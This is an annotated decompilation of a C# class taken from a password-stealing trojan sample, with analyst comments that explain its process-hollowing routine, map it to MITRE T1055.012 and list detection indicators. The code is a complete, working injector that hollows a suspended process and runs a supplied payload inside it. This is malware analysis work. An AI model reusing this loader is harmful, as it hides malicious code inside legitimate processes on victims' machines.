// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: rern5947, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B36B2BF-40BC-44F3-B93C-15B2B8352B1E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe

using System;
using System.Runtime.InteropServices;
using System.Text;

/// <summary>
/// Analyst annotation of a decompiled class. Its single public method, <see cref="R"/>, starts a
/// surrogate executable in a suspended state, unmaps that process's original image, writes the
/// supplied byte array into it section by section, redirects the primary thread and resumes it.
/// This API sequence matches process hollowing (MITRE ATT&amp;CK T1055.012).
/// </summary>
/// <remarks>
/// Detection-relevant behaviour visible in this class:
/// a child process created with creation flag 4 (CREATE_SUSPENDED), followed from the same parent by
/// cross-process NtUnmapViewOfSection, VirtualAllocEx with protection 64 (PAGE_EXECUTE_READWRITE),
/// repeated WriteProcessMemory, SetThreadContext and ResumeThread. After a successful run the
/// in-memory image of the surrogate no longer corresponds to its file on disk.
/// All structures are passed as raw arrays and all offsets are hard-coded for 32-bit layouts
/// (68-byte STARTUPINFO, 4-slot PROCESS_INFORMATION, 179-dword CONTEXT, PE32 header offsets),
/// so the sample appears to target x86 processes only - NOTE(review): confirm against the assembly's
/// platform target.
/// </remarks>
public class IX
{
  // kernel32!CreateProcess. No CharSet is given, so default (ANSI) string marshalling applies.
  // STARTUPINFO and PROCESS_INFORMATION are passed as a raw byte[] / IntPtr[] rather than typed structs.
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool CreateProcess(
    string appName,
    StringBuilder commandLine,
    IntPtr procAttr,
    IntPtr thrAttr,
    [MarshalAs(UnmanagedType.Bool)] bool inherit,
    int creation,
    IntPtr env,
    string curDir,
    byte[] sInfo,
    IntPtr[] pInfo);

  // kernel32!GetThreadContext. The CONTEXT structure is marshalled as a flat uint[].
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);

  // kernel32!SetThreadContext, again with CONTEXT as a flat uint[].
  [DllImport("kernel32")]
  private static extern bool SetThreadContext(IntPtr t, uint[] c);

  // ntdll!NtUnmapViewOfSection. Returns an NTSTATUS; R treats 0 as success.
  [DllImport("ntdll")]
  private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

  // kernel32!ReadProcessMemory. The output buffer is declared as a single ref IntPtr,
  // so this declaration can only receive one pointer-sized value.
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool ReadProcessMemory(
    IntPtr hProc,
    IntPtr baseAddr,
    ref IntPtr bufr,
    int bufrSize,
    ref IntPtr numRead);

  // kernel32!ResumeThread.
  [DllImport("kernel32.dll")]
  private static extern uint ResumeThread(IntPtr hThread);

  // kernel32!VirtualAllocEx (allocation inside another process).
  [DllImport("kernel32")]
  private static extern IntPtr VirtualAllocEx(
    IntPtr hProc,
    IntPtr addr,
    IntPtr size,
    int allocType,
    int prot);

  // kernel32!VirtualProtectEx. Declared here but never called by R.
  [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
  private static extern bool VirtualProtectEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    IntPtr dwSize,
    uint flNewProtect,
    ref uint lpflOldProtect);

  // kernel32!WriteProcessMemory (write into another process's address space).
  [DllImport("kernel32.dll", SetLastError = true)]
  private static extern bool WriteProcessMemory(
    IntPtr hProcess,
    IntPtr lpBaseAddress,
    byte[] lpBuffer,
    uint nSize,
    out int lpNumberOfBytesWritten);

  /// <summary>
  /// Launches <paramref name="surrogateProcess"/> suspended and replaces its mapped image with the
  /// contents of <paramref name="bytes"/>, then resumes the surrogate's primary thread.
  /// </summary>
  /// <param name="bytes">Raw image to map into the surrogate. It is parsed at fixed offsets that
  /// correspond to a PE32 (32-bit) executable - presumably the payload; verify against the caller.</param>
  /// <param name="surrogateProcess">Command line passed to CreateProcess for the host process.</param>
  /// <returns>
  /// <c>false</c> only when an exception is thrown (for example an out-of-range header offset).
  /// <c>true</c> in every other case, including when CreateProcess or any later step fails, so a
  /// <c>true</c> result does not show that the image was actually replaced.
  /// </returns>
  public static bool R(byte[] bytes, string surrogateProcess)
  {
    try
    {
      IntPtr zero1 = IntPtr.Zero;
      // Receives PROCESS_INFORMATION; R uses slot 0 as the process handle and slot 1 as the thread handle.
      IntPtr[] pInfo = new IntPtr[4];
      // Zero-filled stand-in for STARTUPINFO (68 bytes is its 32-bit size).
      byte[] sInfo = new byte[68];
      // Header parsing, assuming bytes is a PE32 image:
      // offset 60 (0x3C) holds e_lfanew, the file offset of the NT headers.
      int int32 = BitConverter.ToInt32(bytes, 60);
      // NT headers + 6: NumberOfSections.
      int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
      // NT headers + 84: SizeOfHeaders.
      IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
      // Creation flag 4 is CREATE_SUSPENDED: the surrogate exists but its primary thread has not run yet.
      if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
      {
        // 179 dwords = 716 bytes, the size of the x86 CONTEXT structure.
        uint[] numArray1 = new uint[179];
        // ContextFlags = 0x10002 (CONTEXT_INTEGER on x86): request the integer registers.
        numArray1[0] = 65538U;
        if (IX.GetThreadContext(pInfo[1], numArray1))
        {
          // Dword 41 of an x86 CONTEXT is Ebx, which for a newly created suspended process points at
          // the PEB; PEB + 8 is the ImageBaseAddress field.
          IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
          IntPtr zero2 = IntPtr.Zero;
          IntPtr bufrSize = new IntPtr(4);
          IntPtr zero3 = IntPtr.Zero;
          // Read the surrogate's current image base (4 bytes) and unmap the image at that address.
          // Nothing below runs unless both calls succeed.
          if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
          {
            // NT headers + 52: ImageBase (preferred load address) of the supplied image.
            IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
            // NT headers + 80: SizeOfImage.
            IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
            // 12288 = 0x3000 (MEM_COMMIT | MEM_RESERVE), 64 = 0x40 (PAGE_EXECUTE_READWRITE).
            // A remote RWX allocation of image size is a strong memory-scanning indicator.
            // The returned address is not checked before use.
            IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
            int lpNumberOfBytesWritten;
            // Copy the first SizeOfHeaders bytes (the PE headers) to the new base. Result is ignored.
            IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
            int num3 = int16 - 1;
            // One iteration per section header; the table is assumed to start at NT headers + 248
            // (true for PE32 with a standard-size optional header), 40 bytes per entry.
            for (int index = 0; index <= num3; ++index)
            {
              // Section header viewed as ten 32-bit values:
              // dst[3] = VirtualAddress, dst[4] = SizeOfRawData, dst[5] = PointerToRawData.
              int[] dst = new int[10];
              Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
              // "- 1 + 1" cancels out; the buffer length is dst[4].
              byte[] numArray2 = new byte[dst[4] - 1 + 1];
              // Convert.ToInt32((string) null, 2) evaluates to 0, i.e. destination offset 0.
              Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
              // Destination in the surrogate: new base + section VirtualAddress (32-bit arithmetic).
              num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
              num1 = new IntPtr(numArray2.Length);
              // Write the section's raw data into the surrogate. Result is ignored.
              IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
            }
            // Overwrite PEB.ImageBaseAddress (same Ebx + 8 location read earlier) with the new base.
            num2 = new IntPtr((long) numArray1[41] + 8L);
            num1 = new IntPtr(4);
            IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
            // Dword 44 of an x86 CONTEXT is Eax, which holds the start address for a suspended
            // primary thread; set it to new base + AddressOfEntryPoint (NT headers + 40).
            numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
            // Return value is not checked.
            IX.SetThreadContext(pInfo[1], numArray1);
          }
        }
        // Runs whenever CreateProcess succeeded, even if the context read, memory read or unmap
        // failed and the block above was skipped. The result is discarded.
        int num = (int) IX.ResumeThread(pInfo[1]);
      }
    }
    catch
    {
      // Any exception (bad offsets, marshalling failure, overflow) is swallowed and reported as false.
      return false;
    }
    return true;
  }
}